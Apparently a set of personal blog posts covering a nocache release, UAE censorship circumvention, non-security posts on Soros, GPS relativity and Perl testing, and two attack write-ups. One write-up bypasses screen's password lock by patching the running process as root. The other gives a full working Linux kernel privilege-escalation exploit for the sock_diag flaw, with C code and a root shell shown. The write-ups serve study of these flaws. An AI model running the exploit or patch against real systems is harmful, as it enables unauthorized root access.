I’m very pleased to announce that a little program of mine called
nocache has officially made it into the Debian distribution and
migrated to Debian testing just a few days ago.
The tool started out as a small hack that employs mmap and mincore
to check which blocks of a file are already in the Linux FS cache, and
uses this info in the intercepted libc’s open/close syscall
wrappers and related functions in an effort to restore the cache to its
pristine state after every file access.
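As a rough illustration of the restore step, the following Python sketch computes which byte ranges of a file would have to be dropped from the cache again after an access. It is not nocache's actual code: the helper name `ranges_to_drop` and the list-of-booleans residency map (one entry per page, as mincore would report it) are assumptions made for this example.

```python
PAGE_SIZE = 4096  # assumed page size; os.sysconf("SC_PAGE_SIZE") gives the real one


def ranges_to_drop(resident_before, page_size=PAGE_SIZE):
    """Return (offset, length) byte ranges covering the pages that were NOT
    cached before the file was opened. Dropping only these ranges afterwards
    leaves previously cached pages alone.

    resident_before: one boolean per page, True if the page was cached.
    """
    ranges = []
    start = None
    for page, was_cached in enumerate(resident_before):
        if not was_cached and start is None:
            start = page  # a run of uncached pages begins here
        elif was_cached and start is not None:
            ranges.append((start * page_size, (page - start) * page_size))
            start = None
    if start is not None:  # the last run extends to the end of the file
        ranges.append((start * page_size,
                       (len(resident_before) - start) * page_size))
    return ranges


print(ranges_to_drop([True, False, False, True, False]))
# [(4096, 8192), (16384, 4096)]
```

On Linux, each resulting range could then be handed to a call such as `os.posix_fadvise(fd, offset, length, os.POSIX_FADV_DONTNEED)` when the file is closed.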
I only wrote this tool as a little “proof of concept”, but it seems there are people out there actually using this, which is nice.
My thanks go out to Dmitry who packaged and will be maintaining the tool for Debian – as well as the other people who engaged in the lively discussions in the issue tracker.
The internet is censored in the UAE. Not really bad like in China – it’s rather used to restrict access to “immoral content”. Because you know, the internet is full of porn and Danish people making fun of The Prophet. – Also, downloading Skype is forbidden (but using it is not).
I have investigated the censorship mechanism of one of the two big providers and will describe the techniques in use and how to effectively circumvent the block.
If you navigate to a “forbidden page” in the UAE, you’ll be presented with a screen warning you that it is illegal under the Internet Access Management Regulatory Policy to view that page.
This is actually implemented in a pretty rudimentary, yet effective
way (if you have no clue how TCP/IP works). If a request to a
forbidden resource is made, the connection is immediately shut down by
the proxy. In the shutdown packet, an <iframe> code is placed that
displays the image:
<iframe src="http://94.201.7.202:8080/webadmin/deny/index.php?dpid=20&
dpruleid=7&cat=105&ttl=0&groupname=Du_Public_IP_Address&policyname=default&
username=94.XX.0.0&userip=94.XX.XX.XX&connectionip=1.0.0.127&
nsphostname=YYYYYYYYYY.du.ae&protocol=nsef&dplanguage=-&url=http%3a%2f%2f
pastehtml%2ecom%2fview%2fc336prjrl%2ertxt"
width="100%" height="100%" frameborder=0></iframe>
Capturing the TCP packets while making a forbidden request – in this case: a
list of banned URLs in the UAE, which itself is banned – reveals one crucial
thing: The GET request actually reaches the web server, but before the answer
arrives, the proxy has already sent the Reset-Connection-Packets. (Naturally,
that is much faster, because it is physically closer.)
Because the client thinks the connection is closed, it will itself send out Reset-Packets to the Webserver in reply to its packets containing the reply (“the webpage”). This actually shuts down the connection in both directions. All of this happens on the TCP level, thus by “client” I mean the operating system. The client application just opens a TCP socket and sees it closed via the result code coming from the OS.
You can see the initial reset-packets from the proxy as entries 5 and 6 in the list; the later RST packets originate from my computer because the TCP stack considers the connection closed.
First, we need to find out at which point our HTTP connection is being hijacked. To do this, we search for the characteristic TCP packet with the FIN, PSH, ACK bits set, while making a request that is blocked. The output will be something like:
$ sudo tcpdump -v "tcp[13] = 0x019"
18:38:35.368715 IP (tos 0x0, ttl 57, ... proto TCP (6), length 522)
host-88-80-29-58.cust.prq.se.http > 192.168.40.73.37630: Flags [FP.], ...
We are only interested in the TTL of the FIN-PSH-ACK packets: By subtracting this from the default TTL of 64 (which the provider seems to be using), we get the number of hops between us and the host. Looking at a traceroute we see that the host that is 64 - 57 = 7 hops away is located at the local ISP. (Never mind the un-routable 10.* appearing in the traceroute. Seeing this was the initial reason for me to think these guys are not too proficient in network technology, no offense.)
$ mtr --report --report-wide --report-cycles=1 pastehtml.com
HOST: mjanja Loss% Snt Last Avg Best Wrst StDev
1.|-- 192.168.40.1 0.0% 1 2.9 2.9 2.9 2.9 0.0
2.|-- 94.XX.XX.XX 0.0% 1 2.9 2.9 2.9 2.9 0.0
3.|-- 10.XXX.0.XX 0.0% 1 2.9 2.9 2.9 2.9 0.0
4.|-- 10.XXX.0.XX 0.0% 1 2.9 2.9 2.9 2.9 0.0
5.|-- 10.100.35.78 0.0% 1 6.8 6.8 6.8 6.8 0.0
6.|-- 94.201.0.2 0.0% 1 7.7 7.7 7.7 7.7 0.0
7.|-- 94.201.0.25 0.0% 1 8.4 8.4 8.4 8.4 0.0
8.|-- 195.229.27.85 0.0% 1 11.1 11.1 11.1 11.1 0.0
9.|-- csk012.emirates.net.ae 0.0% 1 27.3 27.3 27.3 27.3 0.0
10.|-- 195.229.3.215 0.0% 1 146.6 146.6 146.6 146.6 0.0
11.|-- decix-ge-2-7.i2b.se 0.0% 1 156.2 156.2 156.2 156.2 0.0
12.|-- sth-cty1-crdn-1-po1.i2b.se 0.0% 1 164.7 164.7 164.7 164.7 0.0
13.|-- 178.16.212.57 0.0% 1 151.6 151.6 151.6 151.6 0.0
14.|-- cust-prq-nt.i2b.se 0.0% 1 157.5 157.5 157.5 157.5 0.0
15.|-- tunnel3.prq.se 0.0% 1 161.5 161.5 161.5 161.5 0.0
16.|-- host-88-80-29-58.cust.prq.se 0.0% 1 192.5 192.5 192.5 192.5 0.0
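The filter expression and the hop arithmetic above can be spelled out in a few lines of Python. This is only a sketch for illustration; the function names are made up here, and the initial TTL of 64 is the same assumption the text makes about the sender.

```python
# TCP flag bits as they appear in byte 13 of the TCP header
TCP_FLAGS = [(0x01, "FIN"), (0x02, "SYN"), (0x04, "RST"),
             (0x08, "PSH"), (0x10, "ACK"), (0x20, "URG")]


def decode_tcp_flags(value):
    """Return the names of the flag bits set in the TCP flags byte."""
    return [name for bit, name in TCP_FLAGS if value & bit]


def hops_away(observed_ttl, initial_ttl=64):
    """Estimate the sender's distance in hops from the TTL left on arrival."""
    if not 0 < observed_ttl <= initial_ttl:
        raise ValueError("observed TTL does not fit the assumed initial TTL")
    return initial_ttl - observed_ttl


print(decode_tcp_flags(0x19))  # ['FIN', 'PSH', 'ACK']
print(hops_away(57))           # 7
```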
We now know that with a very high probability, all “connection termination” attempts from this close to us – relative to a TTL of 64, which is set by the sender – are the censorship proxy doing its work. So we simply ignore all packets with the RST or FIN flag set that come from port 80 too close to us:
for mask in FIN,PSH,ACK RST,ACK; do
    sudo iptables -I INPUT -p tcp --sport 80 \
        -m tcp --tcp-flags $mask $mask \
        -m ttl --ttl-gt 55 -m ttl --ttl-lt 64 \
        -j DROP;
done
NB: The rule matches TTLs strictly greater than the given value, so we have to check for greater than 56 and subtract one to be on the safe side. You can also leave out the TTL part, but then “regular” TCP terminations remain unseen by the OS, which many programs will find weird (and sometimes data comes with a packet that closes the connection, and this data would be lost).
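To make the matching logic of the two rules explicit, here is a small Python model of them. It is a sketch of the rule semantics only (source port, flag mask, TTL window) and does not touch any real packets; the function name `should_drop` is made up for this example.

```python
FIN, SYN, RST, PSH, ACK = 0x01, 0x02, 0x04, 0x08, 0x10

# (mask, comp) pairs as in "--tcp-flags mask comp": only the bits in mask
# are examined, and of those exactly the bits in comp must be set.
RULES = [
    (FIN | PSH | ACK, FIN | PSH | ACK),
    (RST | ACK, RST | ACK),
]


def should_drop(sport, flags, ttl):
    """Return True if a packet would be dropped by one of the two rules."""
    if sport != 80:
        return False
    if not (55 < ttl < 64):  # --ttl-gt 55 and --ttl-lt 64
        return False
    return any((flags & mask) == comp for mask, comp in RULES)


print(should_drop(80, FIN | PSH | ACK, 57))  # True: forged packet from nearby
print(should_drop(80, FIN | PSH | ACK, 49))  # False: sender is too far away
```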
That’s it. Since the first reply packet from the server is
dropped, or rather replaced with the packet containing the <iframe>
code, we rely on TCP retransmission, and sure enough, some 0.21 seconds
later the same TCP packet is retransmitted, this time not harmed in
any way:

The OS re-orders the packets and is able to assemble the TCP stream. Thus, by simply ignoring two packets the provider sends to us, we have an (almost perfectly) working TCP connection to wherever we want.
I suppose the provider is using relatively old Cisco equipment. For example, some of their documentation hints at how the filtering is implemented. See this PDF, p. 39-5:
When filtering is enabled and a request for content is directed through the security appliance, the request is sent to the content server and to the filtering server at the same time. If the filtering server allows the connection, the security appliance forwards the response from the content server to the originating client. If the filtering server denies the connection, the security appliance drops the response and sends a message or return code indicating that the connection was not successful.
The other big provider in the UAE uses a different filtering technique, which does not rely on TCP hacks but employs a real HTTP proxy. (I heard someone mention “Bluecoat” but have no data to back it up.)
The famous screen program – luckily by now mostly obsolete thanks to tmux – has a feature to “password lock” a session. The manual:
This is useful if you have privileged programs running under screen and you want to protect your session from reattach attempts by another user masquerading as your uid (i.e. any superuser.)
This is of course utter crap. As the super user, you can do anything you like, including changing a program’s executable at run time, which I want to demonstrate for screen as a POC.
The password is checked on the server side (which usually runs with setuid root) here:
if (strncmp(crypt(pwdata->buf, up), up, strlen(up))) {
    ...
    AddStr("\r\nPassword incorrect.\r\n");
    ...
}
If I am root, I can patch the running binary. Ultimately, I want to circumvent this password check. But we need to do some preparation:
First, find the string about the incorrect password that is passed to
AddStr. Since this is a compile-time constant, it is stored in the
.rodata section of the ELF.
Just fire up GDB on the screen binary, list the sections (redacted for brevity here)…
(gdb) maintenance info sections
Exec file:
`/usr/bin/screen', file type elf64-x86-64.
...
0x00403a50->0x0044ee8c at 0x00003a50: .text ALLOC LOAD READONLY CODE HAS_CONTENTS
0x0044ee8c->0x0044ee95 at 0x0004ee8c: .fini ALLOC LOAD READONLY CODE HAS_CONTENTS
0x0044eea0->0x00458a01 at 0x0004eea0: .rodata ALLOC LOAD READONLY DATA HAS_CONTENTS
...
… and search for said string in the .rodata section:
(gdb) find 0x0044eea0, 0x00458a01, "\r\nPassword incorrect.\r\n"
0x45148a
warning: Unable to access target memory at 0x455322, halting search.
1 pattern found.
Now, we need to locate the piece of code comparing the password. Let’s
first search for the call to AddStr by taking advantage of the fact
that we know the address of the string that will be passed as the
argument. We search in .text for the address of the string:
(gdb) find 0x00403a50, 0x0044ee8c, 0x45148a
0x41b371
1 pattern found.
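The two searches above can be modeled in Python on a raw binary image. This is only a sketch of the idea: the helper names are made up, and encoding the address as a 4-byte little-endian value is an assumption that matches how an x86-64 instruction would typically embed such a low address as an immediate.

```python
import struct


def find_in_section(image, file_offset, size, vaddr, needle):
    """Search one section of a binary image for needle.

    image:       the raw bytes of the executable
    file_offset: where the section starts in the file
    size:        length of the section in bytes
    vaddr:       virtual address at which the section is loaded
    Returns the virtual addresses of all matches.
    """
    section = image[file_offset:file_offset + size]
    hits = []
    pos = section.find(needle)
    while pos != -1:
        hits.append(vaddr + pos)
        pos = section.find(needle, pos + 1)
    return hits


def address_as_imm32(addr):
    """Encode an address the way a 32-bit little-endian immediate stores it."""
    return struct.pack("<I", addr)


print(address_as_imm32(0x45148a).hex())  # 8a144500
```

For the binary in the text, the .rodata search would use file offset 0x0004eea0 and virtual address 0x0044eea0, as listed in the section table.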
Now there should be a jne instruction shortly before that (this
instruction stands for “jump if not equal” and has the opcode 0x75).
Let’s search for it:
(gdb) find/b 0x41b371-0x100, +0x100, 0x75
0x41b2f2
1 pattern found.
Decode the instruction:
(gdb) x/i 0x41b2f2
0x41b2f2: jne 0x41b370
This is it. (If you want to be sure, search the instructions before
that. Shortly before that, at 0x41b2cb, I find: callq 403120 <strncmp@plt>.)
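For readers unfamiliar with the encoding, a short conditional jump is two bytes: the opcode and a signed 8-bit displacement relative to the end of the instruction. The Python sketch below decodes such a jump and flips its condition. The displacement byte 0x7c is not shown in the gdb output; it is inferred here from the jump target 0x41b370, so treat it as an assumption.

```python
def decode_short_jcc(addr, code):
    """Decode a two-byte je/jne at addr; return (mnemonic, target address)."""
    opcode, rel8 = code[0], code[1]
    names = {0x74: "je", 0x75: "jne"}
    if opcode not in names:
        raise ValueError("not a short je/jne")
    disp = rel8 - 0x100 if rel8 >= 0x80 else rel8  # sign-extend the byte
    return names[opcode], addr + 2 + disp


def invert_condition(code):
    """Flip the lowest opcode bit: 0x75 (jne) becomes 0x74 (je) and back."""
    return bytes([code[0] ^ 0x01]) + bytes(code[1:])


jne = bytes([0x75, 0x7c])
name, target = decode_short_jcc(0x41b2f2, jne)
print(name, hex(target))  # jne 0x41b370
name, target = decode_short_jcc(0x41b2f2, invert_condition(jne))
print(name, hex(target))  # je 0x41b370
```

Note that a byte-wise search for 0x75 can also hit a byte in the middle of another instruction, which is why checking the surrounding disassembly is worthwhile.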
Now we can simply patch the live binary, changing 0x75 to 0x74 (jne
to je or “jump if equal”), thus effectively inverting the if
expression. Find the screen server process (it’s written in all caps
in the ps output, i.e. SCREEN) and patch it like this, where
=(cmd) is a Z-Shell shortcut for “create temporary file and delete
it after the command finishes”:
$ sudo gdb -batch -p 23437 -x =(echo "set *(unsigned char *)0x41b2f2 = 0x74\nquit")
All done. Just attach using screen -x, but be sure not to enter
the correct password: That’s the only one that will not give you
access now.
So my friend Nico tweeted that there is an “easy linux kernel privilege escalation” and pointed to a fix from three days ago. If that’s so easy, I thought, then I’d like to try: And thus I wrote my first Kernel exploit. I will share some details here. I guess it is pointless to withhold the details or a fully working exploit, since some Russians have already had an exploit for several months, and, as I discovered later, there seem to be several similar versions flying around the net. They differ in technique and reliability, and I guess others can do better than me.
I have no clue what the NetLink subsystem really is, but never mind. The commit description for the fix says:
Userland can send a netlink message requesting SOCK_DIAG_BY_FAMILY with a family greater or equal then AF_MAX -- the array size of sock_diag_handlers[]. The current code does not test for this condition therefore is vulnerable to an out-of-bound access opening doors for a privilege escalation.
So we should do exactly that! One of the hardest parts was actually
finding out how to send such a NetLink message, but I’ll come to that
later. Let’s first have a look at the code that was patched (this is
from net/core/sock_diag.c):
static int __sock_diag_rcv_msg(struct sk_buff *skb, struct nlmsghdr *nlh)
{
    int err;
    struct sock_diag_req *req = nlmsg_data(nlh);
    const struct sock_diag_handler *hndl;
    if (nlmsg_len(nlh) < sizeof(*req))
        return -EINVAL;
    /* check for "req->sdiag_family >= AF_MAX" goes here */
    hndl = sock_diag_lock_handler(req->sdiag_family);
    if (hndl == NULL)
        err = -ENOENT;
    else
        err = hndl->dump(skb, nlh);
    sock_diag_unlock_handler(hndl);
    return err;
}
The function sock_diag_lock_handler() locks a mutex and effectively
returns sock_diag_handlers[req->sdiag_family], i.e. the unsanitized
family number received in the NetLink request. Since AF_MAX is 40,
we can effectively return memory from after the end of
sock_diag_handlers (“out-of-bounds access”) if we specify a family
greater than or equal to 40. This memory is accessed as a
struct sock_diag_handler {
    __u8 family;
    int (*dump)(struct sk_buff *skb, struct nlmsghdr *nlh);
};
… and err = hndl->dump(skb, nlh); calls the function pointed to in
the dump field.
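The class of bug can be modeled in a few lines of Python. This is a toy model, not kernel code: memory is a flat list in which the handler table is followed by unrelated data, and the placeholder values after the table as well as the exception type are invented for this example.

```python
AF_MAX = 40  # size of the handler table, as stated in the text

# Flat model of memory: the table, followed by data that is not part of it.
memory = [None] * AF_MAX + ["unrelated-0", "unrelated-1",
                            "unrelated-2", "unrelated-3"]


def lookup_unchecked(family):
    """Vulnerable variant: indexes straight into memory, like the C code."""
    return memory[family]


def lookup_checked(family):
    """Fixed variant: reject families outside the table before indexing."""
    if family >= AF_MAX:
        raise ValueError("family out of range")
    return memory[family]


print(lookup_unchecked(43))  # unrelated-3, i.e. data from beyond the table
```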
So we know: The Kernel follows a pointer to a sock_diag_handler
struct, and calls the function stored there. If we find some
suitable and (more or less) predictable value after the end of the
array, then we might store a specially crafted struct at the
referenced address that contains a pointer to some code that will
escalate the privileges of the current process. The main function
looks like this:
int main(int argc, char **argv)
{
    prepare_privesc_code();
    spray_fake_handler((void *)0x0000000000010000);
    trigger();
    return execv("/bin/sh", (char *[]) { "sh", NULL });
}
First, we need to store some code that will escalate the privileges. I found these slides and this ksplice blog post helpful for that, since I’m not keen on writing assembly.
/* privilege escalation code */
#define KERNCALL __attribute__((regparm(3)))
void * (*prepare_kernel_cred)(void *) KERNCALL;
void * (*commit_creds)(void *) KERNCALL;
/* match the signature of a sock_diag_handler dumper function */
int privesc(struct sk_buff *skb, struct nlmsghdr *nlh)
{
    commit_creds(prepare_kernel_cred(0));
    return 0;
}
/* look up an exported Kernel symbol */
void *findksym(const char *sym)
{
    void *p, *ret;
    FILE *fp;
    char s[1024];
    size_t sym_len = strlen(sym);
    fp = fopen("/proc/kallsyms", "r");
    if(!fp)
        err(-1, "cannot open kallsyms: fopen");
    ret = NULL;
    /* %1023s leaves room for the terminating NUL in s[1024] */
    while(fscanf(fp, "%p %*c %1023s\n", &p, s) == 2) {
        if(!!strncmp(sym, s, sym_len))
            continue;
        ret = p;
        break;
    }
    fclose(fp);
    return ret;
}
void prepare_privesc_code(void)
{
    prepare_kernel_cred = findksym("prepare_kernel_cred");
    commit_creds = findksym("commit_creds");
}
This is pretty standard, and you’ll find many variations of that in different exploits.
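The symbol lookup itself is plain text parsing. A Python sketch of the same idea follows; the function name `find_ksym` is made up, and unlike the prefix comparison in the C code it compares the whole symbol name, which avoids picking up a longer symbol that merely starts with the same characters. The second address in the sample data is invented.

```python
def find_ksym(lines, symbol):
    """Return the address of symbol from kallsyms-style lines, or None."""
    for line in lines:
        fields = line.split()
        # line format: <hex address> <type letter> <name> [<module>]
        if len(fields) >= 3 and fields[2] == symbol:
            return int(fields[0], 16)
    return None


sample = [
    "ffffffff812b6b10 T sock_diag_register_inet_compat",  # address made up
    "ffffffff812b6aa2 T sock_diag_register",              # line from the text
]
print(hex(find_ksym(sample, "sock_diag_register")))  # 0xffffffff812b6aa2
```

On a live system the lines would come from iterating over `open("/proc/kallsyms")`.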
Now we spray a struct containing this function pointer over a sizable amount of memory:
void spray_fake_handler(const void *addr)
{
    void *pp;
    int po;
    /* align to page boundary */
    pp = (void *) ((ulong)addr & ~0xfffULL);
    pp = mmap(pp, 0x10000, PROT_READ | PROT_WRITE | PROT_EXEC,
        MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0);
    if(pp == MAP_FAILED)
        err(-1, "mmap");
    struct sock_diag_handler hndl = { .family = AF_INET, .dump = privesc };
    for(po = 0; po < 0x10000; po += sizeof(hndl))
        memcpy(pp + po, &hndl, sizeof(hndl));
}
The memory is mapped with MAP_FIXED, which makes mmap() take the
memory location as the de facto location, not merely a hint. The
location must be a multiple of the page size (which is 4096 or 0x1000
by default), and on most modern systems you cannot map the zero-page
(or other low pages), consult sysctl vm.mmap_min_addr for this.
(This is to foil attempts to map code to the zero-page to take
advantage of a Kernel NULL pointer dereference.)
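The alignment and the minimum-address rule amount to two lines of arithmetic. A Python sketch, with made-up helper names and a page size of 0x1000 as in the text; the value passed as `mmap_min_addr` in the example is hypothetical and would be read from the sysctl on a real system.

```python
PAGE_SIZE = 0x1000


def page_align_down(addr):
    """Round an address down to the start of its page (addr & ~0xfff)."""
    return addr & ~(PAGE_SIZE - 1)


def can_map_fixed(addr, mmap_min_addr):
    """A fixed mapping needs a page-aligned address at or above the minimum."""
    return addr % PAGE_SIZE == 0 and addr >= mmap_min_addr


print(hex(page_align_down(0x10abc)))   # 0x10000
print(can_map_fixed(0x10000, 0x10000))  # True
print(can_map_fixed(0x0, 0x10000))      # False
```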
Now for the actual trigger. To get an idea of what we can do, we
should first inspect what comes after the sock_diag_handlers array
in the currently running Kernel (this is only possible with root
permissions). Since the array is static to that file, we cannot look up
the symbol. Instead, we look up the address of a function that
accesses said array, sock_diag_register():
$ grep -w sock_diag_register /proc/kallsyms
ffffffff812b6aa2 T sock_diag_register
If this returns all zeroes, try grepping in /boot/System.map-$(uname -r)
instead. Then disassemble the function. I annotated the relevant
points with the corresponding C code:
$ sudo gdb -c /proc/kcore
(gdb) x/23i 0xffffffff812b6aa2
0xffffffff812b6aa2: push %rbp
0xffffffff812b6aa3: mov %rdi,%rbp
0xffffffff812b6aa6: push %rbx
0xffffffff812b6aa7: push %rcx
0xffffffff812b6aa8: cmpb $0x27,(%rdi) ; if (hndl->family >= AF_MAX)
0xffffffff812b6aab: ja 0xffffffff812b6ae5
0xffffffff812b6aad: mov $0xffffffff81668c20,%rdi
0xffffffff812b6ab4: mov $0xfffffff0,%ebx
0xffffffff812b6ab9: callq 0xffffffff813628ee ; mutex_lock(&sock_diag_table_mutex);
0xffffffff812b6abe: movzbl 0x0(%rbp),%eax
0xffffffff812b6ac2: cmpq $0x0,-0x7e7fe930(,%rax,8) ; if (sock_diag_handlers[hndl->family])
0xffffffff812b6acb: jne 0xffffffff812b6ad7
0xffffffff812b6acd: mov %rbp,-0x7e7fe930(,%rax,8) ; sock_diag_handlers[hndl->family] = hndl;
0xffffffff812b6ad5: xor %ebx,%ebx
0xffffffff812b6ad7: mov $0xffffffff81668c20,%rdi
0xffffffff812b6ade: callq 0xffffffff813628db
0xffffffff812b6ae3: jmp 0xffffffff812b6aea
0xffffffff812b6ae5: mov $0xffffffea,%ebx
0xffffffff812b6aea: pop %rdx
0xffffffff812b6aeb: mov %ebx,%eax
0xffffffff812b6aed: pop %rbx
0xffffffff812b6aee: pop %rbp
0xffffffff812b6aef: retq
The syntax cmpq $0x0,-0x7e7fe930(,%rax,8) means: check if the value
at the address -0x7e7fe930 (which is a shorthand for
0xffffffff818016d0 on my system) plus 8 times %rax is zero – eight
being the size of a pointer on a 64-bit system, and %rax holding the
family field: the preceding movzbl loads the first byte of the struct
that the function's first argument points to, and family is the first
member of that (not packed) struct. So this line is an array
access, and we know that sock_diag_handlers is located at -0x7e7fe930.
(All these steps can actually be done without root permissions: You
can unpack the Kernel with something like k=/boot/vmlinuz-$(uname -r)
&& dd if=$k bs=1 skip=$(perl -e 'read STDIN,$k,1024*1024; print
index($k, "\x1f\x8b\x08\x00");' <$k) | zcat >| vmlinux and start
GDB on the resulting ELF file. Only now you actually need to inspect
the main memory.)
(gdb) x/46xg -0x7e7fe930
0xffffffff818016d0: 0x0000000000000000 0x0000000000000000
0xffffffff818016e0: 0x0000000000000000 0x0000000000000000
0xffffffff818016f0: 0x0000000000000000 0x0000000000000000
0xffffffff81801700: 0x0000000000000000 0x0000000000000000
0xffffffff81801710: 0x0000000000000000 0x0000000000000000
0xffffffff81801720: 0x0000000000000000 0x0000000000000000
0xffffffff81801730: 0x0000000000000000 0x0000000000000000
0xffffffff81801740: 0x0000000000000000 0x0000000000000000
0xffffffff81801750: 0x0000000000000000 0x0000000000000000
0xffffffff81801760: 0x0000000000000000 0x0000000000000000
0xffffffff81801770: 0x0000000000000000 0x0000000000000000
0xffffffff81801780: 0x0000000000000000 0x0000000000000000
0xffffffff81801790: 0x0000000000000000 0x0000000000000000
0xffffffff818017a0: 0x0000000000000000 0x0000000000000000
0xffffffff818017b0: 0x0000000000000000 0x0000000000000000
0xffffffff818017c0: 0x0000000000000000 0x0000000000000000
0xffffffff818017d0: 0x0000000000000000 0x0000000000000000
0xffffffff818017e0: 0x0000000000000000 0x0000000000000000
0xffffffff818017f0: 0x0000000000000000 0x0000000000000000
0xffffffff81801800: 0x0000000000000000 0x0000000000000000
0xffffffff81801810: 0x0000000000000000 0x0000000000000000
0xffffffff81801820: 0x000000000000000a 0x0000000000017570
0xffffffff81801830: 0xffffffff8135a666 0xffffffff816740a0
(gdb) p (0xffffffff81801828- -0x7e7fe930)/8
$1 = 43
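The address arithmetic in this step is easy to double-check in Python. The helper names below are made up for illustration; the stride of 16 bytes is an assumption about the size of struct sock_diag_handler on x86-64 (one byte, padding, then an 8-byte pointer), and the range 0x10000 to 0x20000 is the region mapped in main().

```python
MASK64 = (1 << 64) - 1


def to_unsigned64(value):
    """Interpret a negative displacement as a 64-bit unsigned address."""
    return value & MASK64


def slot_index(addr, base, slot_size=8):
    """Index of the pointer-sized array slot stored at addr."""
    offset = addr - base
    if offset < 0 or offset % slot_size:
        raise ValueError("address is not a slot of this array")
    return offset // slot_size


def hits_spray(addr, start=0x10000, length=0x10000, stride=16):
    """True if addr is the start of one of the sprayed structs."""
    return start <= addr < start + length and (addr - start) % stride == 0


base = to_unsigned64(-0x7e7fe930)
print(hex(base))                             # 0xffffffff818016d0
print(slot_index(0xffffffff81801828, base))  # 43
print(hits_spray(0x17570))                   # True
```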
So now I know that in the Kernel I’m currently running, at the current
moment, sock_diag_handlers[43] is 0x0000000000017570, which is a
low address, but hopefully not too low. (Nico reported 0x17670, and a
current grml live cd in KVM
has 0x17470 there.) So we need to send a NetLink message with
SOCK_DIAG_BY_FAMILY type set in the header, flags at least
NLM_F_REQUEST and the family set to 43. This is what the trigger
does:
void trigger(void)
{
    int nl = socket(PF_NETLINK, SOCK_RAW, 4 /* NETLINK_SOCK_DIAG */);
    if (nl < 0)
        err(-1, "socket");
    struct {
        struct nlmsghdr hdr;
        struct sock_diag_req r;
    } req;
    memset(&req, 0, sizeof(req));
    req.hdr.nlmsg_len = sizeof(req);
    req.hdr.nlmsg_type = SOCK_DIAG_BY_FAMILY;
    req.hdr.nlmsg_flags = NLM_F_REQUEST;
    req.r.sdiag_family = 43; /* guess right offset */
    if(send(nl, &req, sizeof(req), 0) < 0)
        err(-1, "send");
}
All done! Compiling might be difficult, since you need Kernel struct
definitions. I used -idirafter and my Kernel headers.
$ make
gcc -g -Wall -idirafter /usr/src/linux-headers-`uname -r`/include -o kex kex.c
$ ./kex
# id
uid=0(root) gid=0(root) groups=0(root)
Note: If something goes wrong, you’ll get a “general protection fault: 0000 [#1] SMP” that looks scary like this:
But by pressing Ctrl-Alt-F1 and -F7 you’ll get the display back. However, the exploit will not work anymore until you have rebooted. I don’t know the reason for this, but it sure made the development cycle an annoying one…
Update: The Protection Fault occurs when first following a bogus function pointer. After that, the exploit can no longer work because the mutex is still locked and cannot be unlocked. (Thanks, Nico!)
I spent the better part of this evening reading George Soros’s “Reflexivity Lectures” from 2009, and I am deeply impressed. In five very accessible lectures, Soros lays out his theory of reflexivity and applies it to market economics and politics.
Over the past year I have spent a fair amount of time on behavioral economics (see e.g. Kahneman) and on poststructuralism as a philosophy. Both theories play a role in Soros’s argument; overall, much of it is about how we can and should deal with fallacies.
From the conclusion of the first part:
But by far the most impressive attempt [to eliminate the difficulties connected with the human uncertainty principle] has been mounted by economic theory. It started out by assuming perfect knowledge and when that assumption turned out to be untenable it went through ever increasing contortions to maintain the fiction of rational behavior. Economics ended up with the theory of rational expectations which maintains that there is a single optimum view of the future, that which corresponds to it, and eventually all the market participants will converge around that view. This postulate is absurd but it is needed in order to allow economic theory to model itself on Newtonian physics.
The second part deals with the implications of reflexivity for market systems; particularly interesting is the observation that the findings of behavioral economics represent only one side of the coin. Part three reinterprets Popper’s notion of the Open Society, and in part four Soros lists the incompatibilities between Chicago-school capitalism and an open society.
The fifth part offers a summary and an outlook. From today’s perspective, some of the hopes are unfortunately a bit utopian. The dangers mentioned, however, are still very much present.
Highly recommended reading.
Somehow I never really thought about it, but of course the atomic clocks in the GPS satellites are subject to relativistic effects that have to be compensated for:
For GPS satellites, GR [General Relativity Theory] predicts that the atomic clocks at GPS orbital altitudes will tick faster by about 45,900 ns/day because they are in a weaker gravitational field than atomic clocks on Earth's surface. Special Relativity (SR) predicts that atomic clocks moving at GPS orbital speeds will tick slower by about 7,200 ns/day than stationary ground clocks. Rather than have clocks with such large rate differences, the satellite clocks are reset in rate before launch to compensate for these predicted effects. In practice, simply changing the international definition of the number of atomic transitions that constitute a one-second interval accomplishes this goal. Therefore, we observe the clocks running at their offset rates before launch. Then we observe the clocks running after launch and compare their rates with the predictions of relativity, both GR and SR combined. If the predictions are right, we should see the clocks run again at nearly the same rates as ground clocks, despite using an offset definition for the length of one second.
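The two figures in the quote combine into a net offset that is quickly computed. The sketch below only does that arithmetic; converting the daily clock drift into a distance by multiplying with the speed of light is an illustration of scale added here, not a claim from the quoted text.

```python
GR_NS_PER_DAY = 45_900  # satellite clocks tick faster (weaker gravity)
SR_NS_PER_DAY = 7_200   # satellite clocks tick slower (orbital speed)
SPEED_OF_LIGHT = 299_792_458  # m/s

# Net effect: the satellite clock gains this much per day if uncorrected.
net_ns_per_day = GR_NS_PER_DAY - SR_NS_PER_DAY

# Distance light travels during the accumulated daily offset.
drift_m_per_day = net_ns_per_day * 1e-9 * SPEED_OF_LIGHT

print(net_ns_per_day)                 # 38700
print(round(drift_m_per_day / 1000, 1))  # 11.6 (kilometres per day)
```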
The standard book Perl Best Practices advises in chapter 4.5 that
one should use the Readonly Perl module instead of the
constant standard module for various reasons.
An example might look like this:
package Myprogram;
use Exporter;
use Readonly;
our @EXPORT = qw(conffile);
Readonly our $BASEPATH => "$ENV{HOME}/.myprogram";
sub conffile { "$BASEPATH/config.ini" }
If you want to unit test your program now, you cannot just mess around
and replace a potentially existing config file with a bogus
one. You have to create a temporary directory and use that as the base
path. That is, you have to modify your Readonly declared variable.
I’ve not seen this documented, so I guess this might help others:
Internally the method Readonly::Scalar::STORE is called when you do
an assignment (see man perltie for details). In Readonly.pm, this is
redefined to
*STORE = *UNTIE = sub {Readonly::croak $Readonly::MODIFY};
which dies with an error message. So you only have to circumvent this.
The method STORE gets a reference of the location as first argument,
and the value as second argument. So a quick-and-dirty workaround is
just setting
*Readonly::Scalar::STORE = sub { ${$_[0]} = $_[1]; };
prior to assigning to the Readonly variable. If you want to do it properly, you should only change this locally in the block where you re-assign the value, so that subsequent attempts will again produce the usual error message. Such a test might look like this:
use strict;
use warnings;
use Test::More 'no_plan';
use Myprogram;
{
    no warnings 'redefine';
    local *Readonly::Scalar::STORE = sub { ${$_[0]} = $_[1]; };
    $Myprogram::BASEPATH = "/tmp";
}
is(Myprogram::conffile, "/tmp/config.ini", "get config filename");
For non-scalar values, this will probably work similarly. (Read the source if in doubt.)
So I was reading some rather not so clever code today. I had a gut
